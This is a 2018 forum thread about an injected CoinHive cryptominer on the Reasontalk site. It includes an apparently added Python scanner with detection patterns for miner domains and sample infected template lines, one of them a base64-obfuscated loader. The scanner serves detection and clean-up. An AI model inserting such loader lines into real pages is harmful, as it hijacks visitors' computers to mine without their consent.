Sophos Detecting Malware

DinoJ
Posts: 62
Joined: 22 Jan 2015
Location: UK

Post 28 Sep 2018

Hi,

Just wanted to mention that during the last week, whenever I go to the main Reasontalk page before going to the forum, my Sophos AntiVirus says it is blocking malware (see screenshot). Not sure what this is, or if it is a false positive, but just in case I thought I would bring this to your attention.

Kind Regards,

DinoJ
Zac
Posts: 1102
Joined: 19 May 2016

Post 28 Oct 2018

I'm slightly surprised this hasn't been responded to... Sophos is legit and well established.

Surely this guy deserves a reply...?

WongoTheSane
Posts: 1517
Joined: 14 Sep 2015
Location: Paris, France

Post 29 Oct 2018

It should be resolved by now:

viewtopic.php?p=415966#p415966

...but if you still find anything suspicious, please report, it helps!

DinoJ
Posts: 62
Joined: 22 Jan 2015
Location: UK

Post 02 Nov 2018

@Zac Thanks for the bump! Yeah, Sophos is the AV we use at my work and it is really good. I may have just jinxed myself by saying this, but we have had far fewer issues with viruses and malware in the last two years since we switched to it. Excluding the few users who insist on clicking links promising them tax refunds or opening attachments from people/organisations they don't know! But can't blame Sophos for not being able to protect against PEBCAK/PICNIC :lol:

@WongoTheSane Thanks for the response and update, I can confirm Sophos no longer grumbles when I visit your site :)

DinoJ
Posts: 62
Joined: 22 Jan 2015
Location: UK

Post 19 Nov 2018

Just to report, the malware detection on the Reasontalk main page has returned today, this time also triggering Malwarebytes as well as Sophos (see screenshot).

Reasontalk Malware.png
rcbuse
Posts: 818
Joined: 16 Jan 2015
Location: SR388

Post 19 Nov 2018

Could be that the landing page is running bitcoin scripts from https://coinhive.com/. I'm seeing 100% cpu on all my cores when I load reasontalk.com

Emian
Posts: 649
Joined: 16 Jan 2015

Post 20 Nov 2018

rcbuse wrote:
19 Nov 2018
Could be that the landing page is running bitcoin scripts from https://coinhive.com/. I'm seeing 100% cpu on all my cores when I load reasontalk.com
My virus scanner still blocks a CoinHive site when coming here...


Zac
Posts: 1102
Joined: 19 May 2016

Post 20 Nov 2018

Should I worry about this? Is this an internal issue, i.e. put in place by the site owner, or some external hack?

Creativemind
Posts: 2441
Joined: 17 Jan 2015
Location: Stoke-On-Trent, England, UK

Post 20 Nov 2018

Yeah my Avast anti-virus is too.
Adabler
Posts: 229
Joined: 05 Oct 2017
Location: Oslo

Post 20 Nov 2018

Strange. I am using Firefox with tracking blocking, Avast and AdBlock, but I do not see any change in CPU load when accessing reasontalk.com. I don't see exactly what AdBlock is blocking; could it be a dodgy ad causing this?
avasopht
Posts: 1872
Joined: 16 Jan 2015

Post 20 Nov 2018

If you're not running regular (or even automatic) updates on the forum and CMS, you probably got hacked and had malware installed.

You might also want to double check the theme you've installed. Maybe that also opened a backdoor.
MikeMcKew
Posts: 169
Joined: 16 Aug 2017
Location: Leesburg, VA

Post 20 Nov 2018

Thank you everyone, for bringing this to our attention. If anyone else has reports, please continue to post them here. We are looking into this issue and hope to resolve it as quickly as possible.
nickb523
Posts: 215
Joined: 23 Jan 2017
Location: Scotland

Post 20 Nov 2018

I'm seeing the same thing as Panda - pinned 100% cpu on the homepage.

A quick look at the homepage source code tells me that you have indeed been hacked. Something is going on with https://coinhive.com/.

I can sort this out so if you need assistance just give me a shout. :)

Nick

Adabler
Posts: 229
Joined: 05 Oct 2017
Location: Oslo

Post 20 Nov 2018

nickb523 wrote:
20 Nov 2018
I'm seeing the same thing as Panda - pinned 100% cpu on the homepage.
A quick look at the homepage source code tells me that you have indeed been hacked. Something is going on with https://coinhive.com/.
Do you know why something like this only seems to affect some users? What would be considered good practice on our end?
Kenni
Site Admin
Posts: 1191
Joined: 02 Jun 2015
Location: Copenhagen, Denmark

Post 21 Nov 2018

So again, the CoinHive hack hit us.

Basically, "someone" injects a single line of JavaScript into the theme code, loading a CoinHive miner in the background, thus using visitors' CPU to crypto-mine for them (Monero) while the site is open.

It's important for me to stress that this doesn't infect visitors with a virus or anything of the sort, it simply "just" calculates hashes while the site is open!

I've identified which plugin might have opened a backdoor, and cleared it of malicious code. The site doesn't have the CoinHive shortlink anymore and the issue should be resolved.

Please bump this thread and keep reporting if you see the issue coming back!
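The two symptoms in this thread, a one-line loader injected into the theme (Kenni's post) that shows up when you read the homepage source (nickb523's post), are easy to check for mechanically. The following is an added example of my own, not Reasontalk's or phpBB's code: a small Python scanner that flags CoinHive-style loader lines in page or template source, including one hidden in a base64 blob handed to atob(), and a SHA-256 baseline over theme files so a modified template shows up without reading source by eye. The template contents, the file name overall_footer.html and the "SITEKEY" value are constructed sample input; coinhive.com, cnhv.co and authedmine.com are the domains the CoinHive service actually used, while the exact shape of the loader lines is an assumption about what a typical injection looks like.

```python
"""Detect injected in-browser miner loaders (CoinHive-style) in page or
template source, and spot modified theme files with a hash baseline.
Added example, not Reasontalk's or phpBB's code; sample input is constructed."""
import base64
import hashlib
import re
import sys
from dataclasses import dataclass
from typing import Dict, List

# Indicator patterns. The domains are the ones the CoinHive service really used;
# the loader-line shapes are an assumption about how injections typically look.
MINER_PATTERNS = [
    (re.compile(r"coinhive\.com/lib/[\w.-]+\.js", re.I), "CoinHive library load"),
    (re.compile(r"\bcnhv\.co/", re.I), "CoinHive shortlink"),
    (re.compile(r"authedmine\.com", re.I), "AuthedMine loader"),
    (re.compile(r"new\s+CoinHive\.(?:Anonymous|User)\s*\(", re.I), "CoinHive miner constructor"),
]
# Injections are often wrapped as atob("...") so the raw source shows no domain.
ATOB_LITERAL = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")


@dataclass(frozen=True)
class Finding:
    line_no: int
    reason: str
    snippet: str


def _reasons(text: str) -> List[str]:
    return [reason for pat, reason in MINER_PATTERNS if pat.search(text)]


def scan_source(source: str) -> List[Finding]:
    """One Finding per indicator per line, checking the plain text and the
    decoded content of any base64 literal passed to atob()."""
    findings: List[Finding] = []
    for no, line in enumerate(source.splitlines(), start=1):
        for reason in _reasons(line):
            findings.append(Finding(no, reason, line.strip()[:120]))
        for m in ATOB_LITERAL.finditer(line):
            try:
                raw = base64.b64decode(re.sub(r"\s", "", m.group(2)), validate=True)
            except ValueError:  # not valid base64, nothing to decode
                continue
            decoded = raw.decode("utf-8", "replace")
            for reason in _reasons(decoded):
                findings.append(Finding(no, "base64-wrapped " + reason, decoded.strip()[:120]))
    return findings


def hash_files(files: Dict[str, bytes]) -> Dict[str, str]:
    """SHA-256 per theme file. Record this right after a clean install or update
    and keep the copy off the web server, so whoever edits the theme cannot
    also edit the baseline."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def diff_baseline(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Files whose hash changed, plus files that appeared or vanished (a dropped
    PHP file shows up under 'added')."""
    return {
        "modified": sorted(n for n in baseline if n in current and baseline[n] != current[n]),
        "added": sorted(n for n in current if n not in baseline),
        "removed": sorted(n for n in baseline if n not in current),
    }


# Constructed sample: a clean phpBB-style footer template ...
CLEAN_FOOTER = (
    '<div id="page-footer">\n'
    '<script src="/assets/javascript/core.js"></script>\n'
    "</div>\n"
)
# ... the same footer with a loader of the kind Kenni describes appended ...
INFECTED_FOOTER = CLEAN_FOOTER + (
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n'
    '<script>var m=new CoinHive.Anonymous("SITEKEY");m.start();</script>\n'
)
# ... and a variant that hides the shortlink inside a base64 blob.
OBFUSCATED_FOOTER = CLEAN_FOOTER + (
    '<script>document.write(atob("%s"));</script>\n'
    % base64.b64encode(b'<script src="https://cnhv.co/x"></script>').decode()
)

if __name__ == "__main__":
    # Usage: python scan.py styles/<theme>/template/*.html
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for f in scan_source(fh.read()):
                print(f"{path}:{f.line_no}: {f.reason}: {f.snippet}")
```

Run the scanner over the theme's template directory and over a saved copy of the rendered homepage, since a loader can also come from a plugin or a cached page rather than the template itself. The hash diff is the check to keep running after the clean-up Kenni describes, because a plugin that opened a backdoor once can put the line back. Visitors whose ad or tracking blocker already lists the CoinHive domains never load the script, which would explain why Adabler saw no CPU spike while others did.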

Zac
Posts: 1102
Joined: 19 May 2016

Post 22 Nov 2018

Kenni wrote:
21 Nov 2018
So again, the CoinHive hack hit us.

Basically, "someone" injects a single line of JavaScript into the theme code, loading a CoinHive miner in the background, thus using visitors' CPU to crypto-mine for them (Monero) while the site is open.

It's important for me to stress that this doesn't infect visitors with a virus or anything of the sort, it simply "just" calculates hashes while the site is open!

I've identified which plugin might have opened a backdoor, and cleared it of malicious code. The site doesn't have the CoinHive shortlink anymore and the issue should be resolved.

Please bump this thread and keep reporting if you see the issue coming back!
Thanks for the fix.
